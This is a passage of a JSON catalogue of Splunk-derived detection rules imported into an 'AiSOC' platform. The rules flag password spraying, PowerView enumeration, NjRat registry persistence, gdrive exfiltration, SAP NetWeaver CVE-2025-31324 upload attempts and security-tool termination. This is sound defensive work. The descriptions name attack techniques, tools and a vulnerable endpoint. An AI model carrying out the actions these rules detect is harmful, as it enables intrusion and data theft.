If confirmed malicious, this activity could lead to account takeovers and data breaches, allowing attackers to access sensitive information and potentially escalate their privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-user-logins-from-multiple-cities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a3d1df37-c2a9-41d0-aa8f-59f82d6192a8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_user_logins_from_multiple_cities.yml" } }, { "id": "splunk-security-content-a3f8e2c9-7d4b-4e1f-9c6a-2b5d8f3e1a7c", "type": "detection", "name": "Windows Local LLM Framework Execution", "description": "The following analytic detects execution of unauthorized local LLM frameworks (Ollama, LM Studio, GPT4All, Jan, llama.cpp, KoboldCPP, Oobabooga, NutStudio) and Python-based AI/ML libraries (HuggingFace Transformers, LangChain) on Windows endpoints by leveraging process creation events.\nIt identifies cases where known LLM framework executables are launched or command-line arguments reference AI/ML libraries.\nThis activity is significant as it may indicate shadow AI deployments, unauthorized model inference operations, or potential data exfiltration through local AI systems.\nIf confirmed malicious, this could lead to unauthorized access to sensitive data, intellectual property theft, or circumvention of organizational AI governance policies.", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-local-llm-framework-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a3f8e2c9-7d4b-4e1f-9c6a-2b5d8f3e1a7c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_local_llm_framework_execution.yml" } }, { "id": "splunk-security-content-a4214f0b-e01c-41bc-8cc4-d2b71e3056b4", "type": "detection", "name": "Single Letter Process On Endpoint", "description": "The following analytic detects processes with names consisting of a single letter, which is often indicative of malware or an attacker attempting to evade detection. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because attackers use such techniques to obscure their presence and carry out malicious activities like data theft or ransomware attacks. If confirmed malicious, this behavior could lead to unauthorized access, data exfiltration, or system compromise. 
Immediate investigation is required to determine the legitimacy of the process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/single-letter-process-on-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a4214f0b-e01c-41bc-8cc4-d2b71e3056b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/single_letter_process_on_endpoint.yml" } }, { "id": "splunk-security-content-a42f8029-5472-4c33-8943-bb17bb07466a", "type": "detection", "name": "Linux Gdrive Binary Activity", "description": "The following analytic detects the execution of the 'gdrive' tool on a Linux host. This tool allows standard users to perform Google Drive tasks from the command line. Threat actors use it to stage tooling as well as to exfiltrate data. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. 
If confirmed malicious, this could lead to compromise of systems or sensitive data being stolen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-gdrive-binary-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a42f8029-5472-4c33-8943-bb17bb07466a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_gdrive_binary_activity.yml" } }, { "id": "splunk-security-content-a43ae66f-c410-4b3d-8741-9ce1ad17ddb0", "type": "detection", "name": "Windows Disable or Modify Tools Via Taskkill", "description": "The following analytic identifies the use of taskkill.exe to forcibly terminate processes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include specific taskkill parameters. This activity is significant because it can indicate attempts to disable security tools or disrupt legitimate applications, a common tactic in malware operations. 
If confirmed malicious, this behavior could allow attackers to evade detection, disrupt system stability, and potentially gain further control over the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-or-modify-tools-via-taskkill.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a43ae66f-c410-4b3d-8741-9ce1ad17ddb0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml" } }, { "id": "splunk-security-content-a44c0be1-d7ab-41e4-92fd-aa9af4fe232c", "type": "detection", "name": "Windows File Share Discovery With Powerview", "description": "The following analytic detects the execution of the Invoke-ShareFinder PowerShell cmdlet from PowerView. This detection leverages PowerShell Script Block Logging to identify instances where this specific command is executed. Monitoring this activity is crucial as it indicates an attempt to enumerate network file shares, which may contain sensitive information such as backups, scripts, and credentials. 
If confirmed malicious, this activity could enable an attacker to escalate privileges or move laterally within the network, potentially compromising additional systems and sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-share-discovery-with-powerview.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a44c0be1-d7ab-41e4-92fd-aa9af4fe232c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_share_discovery_with_powerview.yml" } }, { "id": "splunk-security-content-a4c76d0a-56b6-44be-814b-939746c4d406", "type": "detection", "name": "Cisco Secure Firewall - Snort Rule Triggered Across Multiple Hosts", "description": "This analytic identifies Snort intrusion signatures that have been triggered by ten or more distinct internal IP addresses within a one-hour window. It leverages Cisco Secure Firewall Threat Defense logs and focuses on the IntrusionEvent event type to detect activity that may indicate broad targeting or mass exploitation attempts. This behavior is often associated with opportunistic scanning, worm propagation, or automated exploitation of known vulnerabilities across multiple systems. 
If confirmed malicious, this could represent the early phase of a coordinated attack aiming to gain a foothold on several hosts or move laterally across the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-snort-rule-triggered-across-multiple-hosts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a4c76d0a-56b6-44be-814b-939746c4d406", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___snort_rule_triggered_across_multiple_hosts.yml" } }, { "id": "splunk-security-content-a4d86702-402b-4a4f-8d06-9d61e6c39cad", "type": "detection", "name": "Windows Unusual NTLM Authentication Destinations By User", "description": "The following analytic detects when an unusual number of NTLM authentications is attempted by the same user account against multiple destinations. This activity typically occurs when an attacker attempts to brute-force, password-spray, or otherwise authenticate to numerous domain-joined Windows devices using an NTLM-based process or attack. 
This same activity may also generate a large number of EventID 4776 events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-ntlm-authentication-destinations-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a4d86702-402b-4a4f-8d06-9d61e6c39cad", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_ntlm_authentication_destinations_by_user.yml" } }, { "id": "splunk-security-content-a4e8f3a4-48b2-11ec-bcfc-3e22fbd008af", "type": "detection", "name": "Interactive Session on Remote Endpoint with PowerShell", "description": "The following analytic detects the use of the `Enter-PSSession` cmdlet to establish an interactive session on a remote endpoint via the WinRM protocol. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this activity by searching for specific script block text patterns. This behavior is significant as it may indicate lateral movement or remote code execution attempts by adversaries. 
If confirmed malicious, this activity could allow attackers to execute commands remotely, potentially leading to further compromise of the network and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/interactive-session-on-remote-endpoint-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a4e8f3a4-48b2-11ec-bcfc-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/interactive_session_on_remote_endpoint_with_powershell.yml" } }, { "id": "splunk-security-content-a4f39755-b1e2-40bb-b2dc-4449c45b0bf2", "type": "detection", "name": "ASL AWS IAM AccessDenied Discovery Events", "description": "The following analytic identifies excessive AccessDenied events within an hour timeframe for IAM users in AWS. It leverages AWS CloudTrail logs to detect multiple failed access attempts from the same source IP and user identity. This activity is significant as it may indicate that an access key has been compromised and is being misused for unauthorized discovery actions. 
If confirmed malicious, this could allow attackers to gather information about the AWS environment, potentially leading to further exploitation or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1580" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-iam-accessdenied-discovery-events.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a4f39755-b1e2-40bb-b2dc-4449c45b0bf2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_iam_accessdenied_discovery_events.yml" } }, { "id": "splunk-security-content-a511426e-184f-4de6-8711-cfd2af29d1e1", "type": "detection", "name": "Okta Multiple Accounts Locked Out", "description": "The following analytic detects multiple Okta accounts being locked out within a short period. It uses the user.account.lock event from Okta logs, aggregated over a 5-minute window, to identify this behavior. This activity is significant as it may indicate a brute force or password spraying attack, where an adversary attempts to guess passwords, leading to account lockouts. 
If confirmed malicious, this could result in potential account takeovers or unauthorized access to sensitive Okta accounts, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-multiple-accounts-locked-out.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a511426e-184f-4de6-8711-cfd2af29d1e1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_multiple_accounts_locked_out.yml" } }, { "id": "splunk-security-content-a51bfe1a-94f0-4822-b1e4-16ae10145893", "type": "detection", "name": "Detect Outlook exe writing a zip file", "description": "The following analytic identifies the execution of `outlook.exe` writing a `.zip` file to the disk.\nIt leverages data from the Endpoint data model, specifically monitoring process and filesystem activities.\nThis behavior can be significant as it may indicate the use of Outlook to deliver malicious payloads or exfiltrate data via compressed files.\nIf confirmed malicious, this activity could lead to unauthorized data access, data exfiltration, or the delivery of malware, potentially compromising the security of the affected system and network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", 
"enabled": false, "path": "detections/splunk-imports/_quarantine/detect-outlook-exe-writing-a-zip-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a51bfe1a-94f0-4822-b1e4-16ae10145893", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_outlook_exe_writing_a_zip_file.yml" } }, { "id": "splunk-security-content-a51bfe1a-94f0-48cc-b4e4-16a110145893", "type": "detection", "name": "Attacker Tools On Endpoint", "description": "The following analytic detects the execution of tools commonly used by cybercriminals, such as those used for unauthorized access, network scanning, or data exfiltration. It leverages process activity data from Endpoint Detection and Response (EDR) agents, focusing on known attacker tool names. This activity is significant because it serves as an early warning system for potential security incidents, enabling prompt response. 
If confirmed malicious, this activity could lead to unauthorized access, data theft, or further network compromise, posing a severe threat to the organization's security infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1036.005", "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/attacker-tools-on-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a51bfe1a-94f0-48cc-b4e4-16a110145893", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/attacker_tools_on_endpoint.yml" } }, { "id": "splunk-security-content-a520b1fe-cc9e-4f56-b762-18354594c52f", "type": "detection", "name": "AWS Successful Single-Factor Authentication", "description": "The following analytic identifies a successful Console Login authentication event for an AWS IAM user account without Multi-Factor Authentication (MFA) enabled. It leverages AWS CloudTrail logs to detect instances where MFA was not used during login. This activity is significant as it may indicate a misconfiguration, policy violation, or potential account takeover attempt. 
If confirmed malicious, an attacker could gain unauthorized access to the AWS environment, potentially leading to data exfiltration, resource manipulation, or further privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-successful-single-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a520b1fe-cc9e-4f56-b762-18354594c52f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_successful_single_factor_authentication.yml" } }, { "id": "splunk-security-content-a560e7f6-1711-4353-885b-40be53101fcd", "type": "detection", "name": "Azure AD Successful Single-Factor Authentication", "description": "The following analytic identifies a successful single-factor authentication event against Azure Active Directory. It leverages Azure SignInLogs data, specifically focusing on events where single-factor authentication succeeded. This activity is significant as it may indicate a misconfiguration, policy violation, or potential account takeover attempt. 
If confirmed malicious, an attacker could gain unauthorized access to the account, potentially leading to data breaches, privilege escalation, or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-successful-single-factor-authentication.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a560e7f6-1711-4353-885b-40be53101fcd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_successful_single_factor_authentication.yml" } }, { "id": "splunk-security-content-a583b9f1-9c3a-4402-9441-b981654dea6c", "type": "detection", "name": "SAP NetWeaver Visual Composer Exploitation Attempt", "description": "Detects potential exploitation attempts targeting CVE-2025-31324, a critical unauthenticated file upload vulnerability in SAP NetWeaver Visual Composer.\nThis flaw allows remote attackers to send specially crafted POST requests to the /developmentserver/metadatauploader endpoint, enabling arbitrary file uploads\u2014commonly webshells\u2014resulting in full system compromise.\nThe detection looks for HTTP HEAD or POST requests with a 200 OK status to sensitive Visual Composer endpoints, which may indicate reconnaissance or active exploitation.\nSuccessful exploitation can lead to attackers gaining privileged access, deploying malware, and impacting business-critical SAP resources.\nImmediate patching and investigation of suspicious activity are 
strongly recommended, as this vulnerability is being actively exploited in the wild.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sap-netweaver-visual-composer-exploitation-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a583b9f1-9c3a-4402-9441-b981654dea6c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/sap_netweaver_visual_composer_exploitation_attempt.yml" } }, { "id": "splunk-security-content-a5d85486-b89c-11eb-8267-acde48001122", "type": "detection", "name": "Allow Inbound Traffic In Firewall Rule", "description": "The following analytic detects a suspicious PowerShell command that allows inbound traffic to a specific local port within the public profile. It leverages PowerShell script block logging (EventCode 4104) to identify commands containing keywords like \"firewall,\" \"Inbound,\" \"Allow,\" and \"-LocalPort.\" This activity is significant because it may indicate an attacker attempting to establish remote access by modifying firewall rules. 
If confirmed malicious, this could allow unauthorized access to the machine, potentially leading to further exploitation and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/allow-inbound-traffic-in-firewall-rule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a5d85486-b89c-11eb-8267-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/allow_inbound_traffic_in_firewall_rule.yml" } }, { "id": "splunk-security-content-a5e451f8-da81-11eb-b245-acde48001122", "type": "detection", "name": "Spoolsv Suspicious Loaded Modules", "description": "The following analytic detects the suspicious loading of DLLs by spoolsv.exe, potentially indicating PrintNightmare exploitation. It leverages Sysmon EventCode 7 to identify instances where spoolsv.exe loads multiple DLLs from the Windows System32 spool drivers x64 directory. This activity is significant as it may signify an attacker exploiting the PrintNightmare vulnerability to execute arbitrary code. 
If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, and persistent access within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spoolsv-suspicious-loaded-modules.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a5e451f8-da81-11eb-b245-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spoolsv_suspicious_loaded_modules.yml" } }, { "id": "splunk-security-content-a5f5fe52-8e50-4fb0-ad1b-780be6c0d857", "type": "detection", "name": "MacOS Network Share Discovery", "description": "Identifies execution of network share enumeration commands (smbutil, showmount) that can be leveraged by adversaries to discover accessible SMB and NFS resources, supporting internal reconnaissance and potential lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1135" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-network-share-discovery.yaml", "provenance": { "source": "splunk/security_content", "source_id": "a5f5fe52-8e50-4fb0-ad1b-780be6c0d857", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": 
"https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_network_share_discovery.yml" } }, { "id": "splunk-security-content-a5fffbbd-271f-4980-94ed-4fbf17f0af1c", "type": "detection", "name": "Windows Njrat Fileless Storage via Registry", "description": "The following analytic detects suspicious registry modifications indicative of NjRat's fileless storage technique. It leverages the Endpoint.Registry data model to identify specific registry paths and values commonly used by NjRat for keylogging and executing DLL plugins. This activity is significant as it helps evade traditional file-based detection systems, making it crucial for SOC analysts to monitor. If confirmed malicious, this behavior could allow attackers to persist on the host, execute arbitrary code, and capture sensitive keystrokes, leading to potential data breaches and further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-njrat-fileless-storage-via-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a5fffbbd-271f-4980-94ed-4fbf17f0af1c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_njrat_fileless_storage_via_registry.yml" } }, { "id": "splunk-security-content-a602d9a2-aaea-45f8-bf0f-d851168d61ca", "type": "detection", "name": "Windows PaperCut NG Spawn Shell", "description": "The following analytic 
detects instances where the PaperCut NG application (pc-app.exe) spawns a Windows shell, such as cmd.exe or PowerShell. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where the parent process is pc-app.exe. This activity is significant as it may indicate an attacker attempting to gain unauthorized access or execute malicious commands on the system. If confirmed malicious, this could lead to unauthorized code execution, privilege escalation, or further compromise of the affected environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-papercut-ng-spawn-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a602d9a2-aaea-45f8-bf0f-d851168d61ca", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_papercut_ng_spawn_shell.yml" } }, { "id": "splunk-security-content-a6b3ab4e-dd77-4213-95fa-fc94701995e0", "type": "detection", "name": "Suspicious Reg exe Process", "description": "The following analytic identifies instances of reg.exe being launched from a command prompt (cmd.exe) that was not initiated by the user, as indicated by a parent process other than explorer.exe. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process names. 
This activity is significant because reg.exe is often used in registry manipulation, which can be indicative of malicious behavior such as persistence mechanisms or system configuration changes. If confirmed malicious, this could allow an attacker to modify critical system settings, potentially leading to privilege escalation or persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-reg-exe-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a6b3ab4e-dd77-4213-95fa-fc94701995e0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_reg_exe_process.yml" } }, { "id": "splunk-security-content-a7093c28-796c-4ebb-9997-e2c18b870837", "type": "detection", "name": "Windows PowerView SPN Discovery", "description": "The following analytic detects the execution of the `Get-DomainUser` or `Get-NetUser` PowerShell cmdlets with the `-SPN` parameter, indicating the use of PowerView for SPN discovery. It leverages PowerShell Script Block Logging (EventCode=4104) to identify these specific commands. This activity is significant as it suggests an attempt to enumerate domain accounts associated with Service Principal Names (SPNs), a common precursor to Kerberoasting attacks. 
If confirmed malicious, this could allow an attacker to identify and target accounts for credential theft, potentially leading to unauthorized access and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powerview-spn-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7093c28-796c-4ebb-9997-e2c18b870837", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powerview_spn_discovery.yml" } }, { "id": "splunk-security-content-a7131dae-34e3-11ec-a2de-acde48001122", "type": "detection", "name": "Gdrive suspicious file sharing", "description": "The following analytic identifies suspicious file-sharing activity on Google Drive, where internal users share documents with more than 50 external recipients. It leverages GSuite Drive logs, focusing on changes in user access and filtering for emails outside the organization's domain. This activity is significant as it may indicate compromised accounts or intentional data exfiltration. 
If confirmed malicious, this behavior could lead to unauthorized access to sensitive information, data leaks, and potential compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gdrive-suspicious-file-sharing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "a7131dae-34e3-11ec-a2de-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gdrive_suspicious_file_sharing.yml" } }, { "id": "splunk-security-content-a7539705-7183-4a12-9b6a-b6eef645a6d7", "type": "detection", "name": "Detect Password Spray Attack Behavior On User", "description": "The following analytic identifies any user failing to authenticate from 10 or more unique sources. This behavior could represent an adversary performing a Password Spraying attack to obtain initial access or elevate privileges. This logic can be used for real time security monitoring as well as threat hunting exercises. Environments can be very different depending on the organization. 
